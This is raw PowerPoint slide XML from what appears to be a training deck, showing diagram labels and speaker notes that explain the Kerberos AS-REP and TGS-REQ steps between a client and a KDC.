          <p:nvSpPr>
            <p:cNvPr id="8" name="Arrow: Right 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D810250C-9DE1-483A-8B02-7F4E15E8EF42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2628049" y="3141775"/>
              <a:ext cx="6877901" cy="1005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E536C8-1B90-4D0F-BE91-7301CD7B674C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5216592" y="1748434"/>
              <a:ext cx="1713931" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS-REP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C35598-BEBC-4EEF-BAD0-69C2C5A0890E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="322765" y="2539262"/>
              <a:ext cx="2246768" cy="2332493"/>
              <a:chOff x="563984" y="2305616"/>
              <a:chExt cx="2246768" cy="2332493"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Graphic 5" descr="Monitor with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76019EE1-A747-4E35-91AE-62AD8BEF5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984" y="2305616"/>
                <a:ext cx="2246768" cy="2246768"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="TextBox 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0448280D-0A73-4959-990C-3326068B605E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1300082" y="4268777"/>
                <a:ext cx="774571" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Client</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F70B42-CD94-42DA-8700-543EF2A1D6C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9524344" y="2465846"/>
              <a:ext cx="2243984" cy="2405909"/>
              <a:chOff x="9452716" y="2308400"/>
              <a:chExt cx="2243984" cy="2405909"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Graphic 6" descr="Server with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F881537-E5A7-499B-B350-810C3B367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716" y="2308400"/>
                <a:ext cx="2243984" cy="2243984"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="TextBox 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3200B4-E405-491A-968E-C77D3C38FF09}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10238718" y="4344977"/>
                <a:ext cx="671979" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>KDC</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp useBgFill="1">
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B19C5E-11F8-4F60-A727-E21BCB67BF5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3460380" y="2320789"/>
              <a:ext cx="5569320" cy="2708411"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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5EDCE6-C4E6-4B97-BC52-45387AFFA1D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6392580" y="3242244"/>
              <a:ext cx="2528419" cy="1787060"/>
              <a:chOff x="4669966" y="1822241"/>
              <a:chExt cx="2528419" cy="1787060"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64E1628-D8F6-4377-968C-967AE47DEA5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4669966" y="1822241"/>
                <a:ext cx="2528419" cy="1138773"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Username</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>TGT Expiration Time</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD5C5571-EA33-46DD-9CD9-582F0D8444AA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5057056" y="2962970"/>
                <a:ext cx="1762021" cy="646331"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>krbtgt</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> Hash</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D142CB6D-353B-46D6-BDB6-BC7678230D37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3599099" y="3237199"/>
              <a:ext cx="2528419" cy="1819822"/>
              <a:chOff x="4669966" y="1822241"/>
              <a:chExt cx="2528419" cy="1819822"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="TextBox 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A48F282D-6A19-4C96-AB04-4F648DED3A50}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4669966" y="1822241"/>
                <a:ext cx="2528419" cy="1138773"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="34925">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>TGT Expiration Time</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User Nonce</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="TextBox 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F812B6-2673-4878-9541-0B5F82E6EF8C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5053164" y="2995732"/>
                <a:ext cx="1762021" cy="646331"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Encrypted with </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User Hash</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B75B53C-1AEB-4AF0-94FF-140B1EDD986D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7333623" y="2878195"/>
              <a:ext cx="646331" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197FA5DB-4B4C-4025-AE2F-DD7832E08DC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3821074" y="2585807"/>
              <a:ext cx="2074607" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{864105E5-D40C-4230-B87D-5FDF288C3CEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4877051"/>
            <a:ext cx="11338560" cy="1455630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If everything checked out before, a TGT is created and encrypted with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>KDC also sends data back to the client with the original hash – the client can decrypt this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5077109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A0CD6-938D-48FA-B700-88D60ADA5280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>275</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F795ED5-5958-4AEA-B4A2-5DBC95AAE69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 3 – TGS-REQ (Ticket Granting Service Request)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123BAEE1-2C32-4E69-B4B9-92272DEF0190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="322765" y="1310284"/>
            <a:ext cx="11445563" cy="3280766"/>
            <a:chOff x="322765" y="1748434"/>
            <a:chExt cx="11445563" cy="3280766"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Arrow: Right 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D810250C-9DE1-483A-8B02-7F4E15E8EF42}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2657050" y="3141775"/>
              <a:ext cx="6877901" cy="1005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E536C8-1B90-4D0F-BE91-7301CD7B674C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5054667" y="1748434"/>
              <a:ext cx="2053767" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TGS-REQ</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C35598-BEBC-4EEF-BAD0-69C2C5A0890E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="322765" y="2539262"/>
              <a:ext cx="2246768" cy="2332493"/>
              <a:chOff x="563984" y="2305616"/>
              <a:chExt cx="2246768" cy="2332493"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Graphic 5" descr="Monitor with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76019EE1-A747-4E35-91AE-62AD8BEF5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984" y="2305616"/>
                <a:ext cx="2246768" cy="2246768"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="TextBox 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0448280D-0A73-4959-990C-3326068B605E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1300082" y="4268777"/>
                <a:ext cx="774571" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Client</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F70B42-CD94-42DA-8700-543EF2A1D6C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9524344" y="2465846"/>
              <a:ext cx="2243984" cy="2405909"/>
              <a:chOff x="9452716" y="2308400"/>
              <a:chExt cx="2243984" cy="2405909"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Graphic 6" descr="Server with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F881537-E5A7-499B-B350-810C3B367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716" y="2308400"/>
                <a:ext cx="2243984" cy="2243984"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="TextBox 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3200B4-E405-491A-968E-C77D3C38FF09}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10238718" y="4344977"/>
                <a:ext cx="671979" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>KDC</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp useBgFill="1">
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B19C5E-11F8-4F60-A727-E21BCB67BF5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3311340" y="2320789"/>
              <a:ext cx="5569320" cy="2708411"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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5EDCE6-C4E6-4B97-BC52-45387AFFA1D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4613308" y="3708392"/>
              <a:ext cx="2965383" cy="764924"/>
              <a:chOff x="4457511" y="2555860"/>
              <a:chExt cx="2965383" cy="764924"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="TextBox 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E64E1628-D8F6-4377-968C-967AE47DEA5E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4675994" y="2555860"/>
                <a:ext cx="2528419" cy="461665"/>
              </a:xfrm>
